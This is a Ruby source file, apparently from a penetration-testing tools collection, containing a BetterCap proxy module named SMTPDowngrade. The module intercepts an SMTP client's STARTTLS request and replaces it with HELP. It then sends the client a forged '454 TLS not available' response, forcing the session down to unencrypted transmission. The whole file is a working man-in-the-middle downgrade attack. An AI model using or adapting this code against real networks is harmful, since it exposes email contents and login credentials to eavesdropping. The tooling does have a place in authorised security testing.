mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-29 05:46:55 +01:00
43 lines
1.3 KiB
Ruby
43 lines
1.3 KiB
Ruby
|
=begin
|
||
|
Author : @mgeeky
|
||
|
Email : mb@binary-offensive.com
|
||
|
This project is released under the GPL 3 license.
|
||
|
=end
|
||
|
|
||
|
class SMTPDowngrade < BetterCap::Proxy::TCP::Module
|
||
|
meta(
|
||
|
'Name' => 'SMTPDowngrade',
|
||
|
'Description' => 'Downgrades SMTP encryption by returning deny to STARTTLS request.',
|
||
|
'Version' => '1.0.0',
|
||
|
'Author' => 'mgeeky - mb@binary-offensive.com - https://github.com/mgeeky',
|
||
|
'License' => 'GPL3'
|
||
|
)
|
||
|
|
||
|
def on_response(event)
|
||
|
if @respondwith != nil
|
||
|
BetterCap::Logger.info "[#{'SMTP Downgrade'.green}] Lying that SMTP server does not support SSL/TLS."
|
||
|
event.data = @respondwith
|
||
|
@respondwith = nil
|
||
|
end
|
||
|
|
||
|
BetterCap::Logger.raw "\n#{BetterCap::StreamLogger.hexdump( event.data )}\n"
|
||
|
end
|
||
|
|
||
|
def on_data(event)
|
||
|
@respondwith = smtp_parse_request(event)
|
||
|
end
|
||
|
|
||
|
def smtp_parse_request(event)
|
||
|
return nil if not event.data
|
||
|
|
||
|
if event.data =~ /^STARTTLS\s*\r\n/
|
||
|
BetterCap::Logger.info "[#{'SMTP Downgrade'.green}] Intercepted STARTTLS command."
|
||
|
@respondwith = "454 4.7.0 TLS not available due to local problem\r\n"
|
||
|
|
||
|
event.data = "HELP\r\n"
|
||
|
end
|
||
|
|
||
|
BetterCap::Logger.raw "\n#{BetterCap::StreamLogger.hexdump( event.data )}\n"
|
||
|
end
|
||
|
end
|